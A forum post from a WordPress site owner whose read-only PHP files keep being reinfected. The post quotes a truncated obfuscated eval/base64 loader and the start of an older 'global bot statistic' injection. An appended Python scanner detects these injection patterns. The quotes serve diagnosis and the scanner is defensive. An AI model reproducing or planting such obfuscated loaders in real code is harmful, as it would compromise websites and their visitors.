  • All the PHP files have malware binary code inserted at the top of the file, but the files themselves are read-only. (Permission 444)

    Here is an example:
    <?php function qzacgowokc($wnv){$a30q='64';$gvea='$w';$zqe='o';$youp='nv';$y9n0='$w';$i3pz='ase';$otfu='ec';$dk5j='d';$kihc='=b';$ako7='_';$x1i='de(';$jtkw=');';$vy='nv';eval($y9n0.$vy.$kihc.$i3pz.$a30q.$ako7.$dk5j.$otfu.$zqe.$x1i.$gvea.$youp.$jtkw);return $wnv;}$dhjwcu='NyJKCmNDIjdoQ2

    I previously was hacked with the “google bot statistic” malware. I commented on it at the end of the thread here:
    Here is an example:

      // This code use for global bot statistic
      $sUserAgent = strtolower($_SE

    I’ve changed passwords, checked permissions, re-updated to WordPress, changed the theme and still it seems they are getting in. I’ve discussed it with my host but they haven’t gotten back to me (GoDaddy).

    Does anyone have any tips on tracking how it is happening? Someone mentioned seeing FTP logs but GoDaddy insists there aren’t FTP logs available.

    Even if I go back to an old version of my site I think it will continue to happen.
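
Added example, not part of the original post: a defender-side scan that walks a site tree and lists PHP files whose first line matches the injection style quoted above (an `eval(` fed by many short string fragments) or that contain the "global bot statistic" marker comment, together with each file's permission bits. The function names, the threshold of 8 fragments, the 4-character fragment limit and the sample files are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Short string fragments assigned to throwaway variables, e.g. $a30q='64';
# (the 0-4 character limit is an assumption based on the quoted sample)
FRAGMENT = re.compile(r"\$\w+\s*=\s*'[^']{0,4}'\s*;")
# Marker comment quoted in the post for the earlier infection.
MARKER = "global bot statistic"

def classify(head):
    """Return a reason string if the start of a PHP file looks injected, else None."""
    first_line = head.split("\n", 1)[0]
    if "eval(" in first_line and len(FRAGMENT.findall(first_line)) >= 8:
        return "eval built from string fragments on first line"
    if MARKER in head.lower():
        return "bot-statistic marker comment"
    return None

def scan_tree(root, head_bytes=4096):
    """Walk root and return (path, octal mode, reason) for each suspicious .php file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(head_bytes).decode("latin-1")
            reason = classify(head)
            if reason:
                mode = stat.S_IMODE(os.stat(path).st_mode)
                hits.append((path, oct(mode), reason))
    return sorted(hits)

def demo():
    """Build a constructed sample tree (harmless placeholder code) and scan it."""
    injected = "<?php function f($w){" + "".join(
        "$v%d='ab';" % i for i in range(10)) + "eval($v0.$v1);return $w;} ?>\n<?php echo 1;\n"
    clean = "<?php\n// normal theme file\n$title = 'Home';\neval_helper();\n"
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.php", injected), ("clean.php", clean)):
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        os.chmod(os.path.join(root, "index.php"), 0o444)
        return [(os.path.basename(p), m, r) for p, m, r in scan_tree(root)]

if __name__ == "__main__":
    print(demo())
```

Running `scan_tree` against a copy of the site and comparing the flagged files' modification times with the web server access log narrows down when the files were rewritten.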

